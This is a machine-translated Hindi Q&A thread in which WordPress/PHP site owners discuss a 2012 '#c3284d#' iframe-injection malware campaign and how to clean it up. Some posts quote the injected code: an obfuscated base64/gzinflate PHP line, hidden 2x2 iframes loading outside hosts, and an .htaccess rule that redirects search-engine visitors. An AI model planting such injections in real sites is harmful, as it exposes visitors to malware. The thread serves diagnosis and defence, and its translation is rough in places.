1. घर
  2. सवाल और जवाब
  3. वेबसाइट आईफ्रेम हमले - स्रोत

वेबसाइट आईफ्रेम हमले - स्रोत

2012-07-11 17 views
6

में कोड सम्मिलित करता है पिछले कुछ दिनों में, मेरी वेबसाइट बार-बार आईफ्रेम हमले का लक्ष्य रहा है। कोड मुख्य रूप से PHP और जावास्क्रिप्ट पृष्ठों में जोड़ा गया है। (थोड़ा इसे बेअसर करने के लिए मैं कोड बदल दिया है) कोड तो पीएचपी आधार 64 इनकोडिंग, उदाहरण देखें:वेबसाइट आईफ्रेम हमले - स्रोत

#c3284d# 
echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8 VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L"))); 
#/c3284d#

यह डीकोड इस तरह दिखता है:

<script type="text/javascript"> 
    document.write(
     '<iframe src="http://opticmoxie.com/xxxxxxx.php"  
     name="Twitter" scrolling="auto" frameborder="no" 
     align="center" height="2" width="2"></iframe>' 
    );

आम बात यह है कि सभी कोड में "# c3284d #" टिप्पणी है इसलिए दुर्भावनापूर्ण कोड को ट्रैक करना मुश्किल नहीं है। लेकिन यह समय लेने वाला है ...

हम ग्रैडवेल (यूके) में एक साझा सर्वर पर हैं और वे विशेष रूप से सहायक नहीं हैं। तो सवाल यह है कि मैं क्या खुद को दोहरा से इस मुद्दे को रोकने के लिए कर सकते हैं? मैं MySQL इंजेक्शन हमलों के बारे में पता कर रहा हूँ और इस तरह के हमलों से सुरक्षा के लिए PHP के mysql_real_escape_string का उपयोग करें।

साइट PHP और MySQL ड्राइव है। हम MySQLFTP का उपयोग करें और SSH पहुँच के लिए एक खोल खाता है। हम वर्डप्रेस का उपयोग करते हैं (प्लगइन डी-एक्टिवेटेड के साथ नवीनतम अपडेट)।

स्रोत

2012-07-11 monkey64

+1

तक पहुंच चुके हैं तो इस तरह के प्रश्न के बारे में बहुत सारे PHP लोअर मौजूद हैं, और मैं आपको इसकी तलाश करने के लिए प्रोत्साहित करता हूं। हालांकि, इस प्रश्न का पार्श्व-विचार जवाब है "[PHP के अलावा कुछ और उपयोग करें।] (http://me.veekun.com/blog/2012/04/09/php-a-fractal-of-bad-design/)" PHP सुरक्षा समस्याओं से अधिक प्रवण है अन्य भाषाओं। –

+1

एक पुराना सवाल है, लेकिन अभी भी इस बिंदु को बनाने लायक है: एक हैश स्कैनर प्राप्त करें और इसे अपने खाते में इंस्टॉल करें। PHP में बहुत कुछ हैं, जो मैं कह सकते हैं। ये क्रॉन का उपयोग यह जांचने के लिए करते हैं कि कौन सी फाइलें नई हैं या बदली हैं, और यदि संदिग्ध परिवर्तन पाए जाते हैं तो आपको ईमेल कर सकते हैं। – halfer

उत्तर

0

मुझे भी वही समस्या है। http://www.webmasterworld.com/html/4472821.htm और http://stopmalvertising.com/malware-reports/the-c3284d-malware-network-stats.php.html

आशा:

> #c3284d# <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} 
> ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) 
> RewriteRule ^(.*)$ http://onestopchinasource.com/catalog/stats.php 
> [R=301,L] </IfModule> 
> #/c3284d#

मैं इस मुद्दे के बारे में दो लेख नहीं मिले: मेरे मामले में संलग्न कोड

<!--c3284d--><script type="text/javascript"> 
document.write('<iframe src="http://poseyhumane.org/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); 
</script><!--/c3284d-->

इसके अलावा है, वहाँ के रूप में नीचे एक .htaccess फ़ाइल है यह

स्रोत

2012-07-11 17:56:33 Thang

+1

इस पोस्ट को लिखने के कुछ ही समय बाद, मैलवेयर द्वारा फिर से मारा गया था। हालांकि, मेरे एफ़टीपी, एसएसएच और माईएसक्यूएल पासवर्ड बदलने के बाद, मेरे पास कोई और समस्या नहीं है। मैं लेख से सहमत हूं। साझा होस्टिंग सिर्फ समस्याओं का कारण बनता है। अब वर्चुअल प्राइवेट सर्वर खाता खोला है। – monkey64

1

में एक ही समस्या थी। एफ़टीपी सर्वर के एक्सेस लॉग से पता चला है कि एक हैक किए गए एफ़टीपी पासवर्ड का उपयोग करके संशोधन किए गए थे।

स्रोत

2012-07-14 17:46:28 abaumg

1

मेरे पास कई अलग-अलग डोमेन पर अलग-अलग हैक की गई फ़ाइलों की एक ही समस्या और भिन्नताएं हैं। मुझे लगता है कि एक आम बात वर्डप्रेस है। हमारे पास इनमें से कई सर्वरों पर वर्डप्रेस है और मुझे लगता है कि यह आम अपराधी है। मैंने अपने सभी WordPress खातों को अपडेट किया है, सभी डोमेन खातों के लिए सभी पासवर्ड बदल दिए हैं। सुनिश्चित नहीं है कि समस्या अभी तक पूरी तरह से हल हो गई है।

स्रोत

2012-07-19 22:07:19 Larry

1

मुझे एक ही समस्या थी लेकिन एक वर्डप्रेस साइट में।

मुझे लगता है कि साइट विगेट्स के माध्यम से संक्रमित थी, क्योंकि मैं एक प्लगइन का उपयोग करता हूं जो PHP कोड को निष्पादित करने की अनुमति देता है।

मेरे सबसे अच्छा समाधान था:

  • संदिग्ध विजेट को खत्म;
  • एक संक्रमित फ़ाइल का समय और दिनांक देखें (मेरा मामला: header.php);
  • स्पष्ट सभी संक्रमित फ़ाइलों (मेरे मामले में मैं इस साइट का एक बैकअप है);
  • उस समय संदिग्ध आईपी के लिए लॉग फ़ाइल में खोजें (ब्लैकलिस्ट पर खोज आईपी खोजें);
  • संदिग्ध आईपी प्रतिबंध लगाने के लिए एक प्लगइन स्थापित।

उस क्षण से समस्या समाप्त हो गई थी। उम्मीद है इससे आपको मदद मिलेगी।

स्रोत

2012-07-27 14:36:48 Mario

1

मेरे द्वारा प्रशासित सभी वर्डप्रेस साइटों पर एक ही समस्या थी। संक्रमण का स्रोत नहीं मिला, मैं शर्त लगाता हूं कि यह मेरे कंप्यूटर पर कुछ कीड़ा है या यह कुछ प्लगइन है जिसे मैंने सभी साइटों पर स्थापित किया है।

मुझे उन सभी फ़ाइलों को मिला जो WP-बेहतर सुरक्षा प्लगइन लॉग में संशोधित किए गए थे और अतिरिक्त संक्रमित कोड हटा दिए गए थे और जब मैंने संक्रमण की स्रोत वाली सभी फ़ाइलों पर chmod 444 बनाया था।

अब 1 महीने बुराई iframes/htacess और अन्य सामान के बाद से मुक्त हूं।

स्रोत

2012-12-21 21:45:35 Lukas

1

मुझे एक ही समस्या थी और पाया कि जिस विधि में वे उपयोग करते थे वह एक हैक किए गए FTP पासवर्ड था।

भले ही यह सीपीएचएलएल ब्रूट फोर्स सुरक्षा सक्षम के साथ एक सीपीनल सर्वर पर चल रहा है, मैंने पाया कि हैकर्स ने हजारों अलग-अलग समझौता किए गए होस्टों के माध्यम से अपना रास्ता मजबूर करने का प्रयास किया।

सौभाग्य से मेरे पास अपलोड की गई सभी फ़ाइलों का लॉग था इसलिए मैंने इन फ़ाइलों को बैकअप से पुनर्स्थापित करने के लिए एक स्क्रिप्ट लिखी।

तब मैंने खाता लॉक होने से पहले आवश्यक विफल प्रयासों की संख्या को कम करके सीपीनल ब्रूट फोर्स सुरक्षा स्तर में वृद्धि की।

स्रोत

2013-02-14 00:47:48 Rabbie

-1

बुरे लोगों के पास आपके कोड तक पहुंच है, इसलिए आपको उनकी पहुंच बंद करनी होगी, इस बीच आप एक साधारण स्क्रिप्ट का उपयोग कर सकते हैं जो सभी लाइनों को चेक और डिलीट करता है जहां यह gzinflate (base64_decode, लेकिन यहां तक ​​कि सबसे अच्छा कोड (चेकसम चेकर) बैकअप फाइलों के साथ) यदि वे अभी भी

स्रोत

2014-12-12 16:35:02 Nemesis

संबंधित मुद्दे

 संबंधित मुद्दे